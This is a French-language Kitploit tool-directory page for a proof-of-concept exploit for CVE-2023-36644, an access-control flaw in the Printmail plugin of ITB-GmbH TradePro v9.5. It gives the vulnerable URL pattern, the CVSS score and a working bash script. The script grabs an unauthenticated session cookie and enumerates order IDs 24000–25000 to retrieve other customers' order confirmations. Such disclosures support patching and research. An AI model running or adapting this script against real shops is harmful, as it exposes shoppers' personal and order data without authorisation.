Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-36644 — Exploit de preuve de concept pour CVE-2023-36644, démontrant la divulgation d'informations à distance via un contrôle d'accès incorrect dans le plugin Printmail d'ITB-GmbH TradePro v9.5. Inclut un script bash pour l'énumération des confirmations de commande. | Kitploit
Outils/GitHubGitHub/caffeinated-labs/cve-2023-36644
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubcaffeinated-labs/cve-2023-36644

CVE-2023-36644

Exploit de preuve de concept pour CVE-2023-36644, démontrant la divulgation d'informations à distance via un contrôle d'accès incorrect dans le plugin Printmail d'ITB-GmbH TradePro v9.5. Inclut un script bash pour l'énumération des confirmations de commande.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôtSite web
2il y a 2 ansPas encore vérifié
Partager

== Logiciel affecté [%hardbreaks] Fournisseur : ITB-GmbH Produits concernés : TradePro (v9.5) Composant : Plugin Printmail Confirmé : oui

== Vecteur d'attaque [%hardbreaks] Type : Contrôle d'accès incorrect Type d'accès : À distance Impact : Divulgation d'informations

Un contrôle d'accès incorrect dans le plugin printmail de ITB-GmbH TradePro v9.5 permet à des attaquants distants de recevoir toutes les confirmations de commande de la boutique en ligne en passant des numéros de commande arbitraires à un point de terminaison http(s).

== Description Le orderid doit être connu à l'avance mais peut être énuméré facilement ou en utilisant une SQLi (voir le rapport link:/security/CVE-2023-36645[CVE-2023-36645])

L'appel à http(s)://[DOMAIN]/shop/de/?plugin=printmail&wkid=[COOKIE]&orderid=[ORDER_ID] avec un cookie de session valide mais non authentifié donne à l'attaquant accès à toutes les confirmations de commande.

== CVSS [%hardbreaks] Score : 7.1 Vecteur : https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P]

== Preuve de concept [source, bash]

#! /bin/bash DOMAIN=$1 TEST_PATH="shop/de/sys/" #TEST_PATH="shop/de/" SAMPLE1_ID=0

COOKIE=$(curl -s -c - $DOMAIN | grep sessiontradepro | cut -f7) echo "Got Cookie: $COOKIE" SAMPLE1=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE1_ID" | grep size_download | cut -d" " -f2) echo Test URL: "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=%ID%" echo "========" echo $SAMPLE1_ID $SAMPLE1 for SAMPLE2_ID in {24000..25000} do SAMPLE2=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE2_ID" | grep size_download | cut -d" " -f2) echo $SAMPLE2_ID $SAMPLE2 done

== Crédits

  • Lynn
  • Jadyn
  • https://zerforschung.org[zerforschung.org]
Télécharger l’outil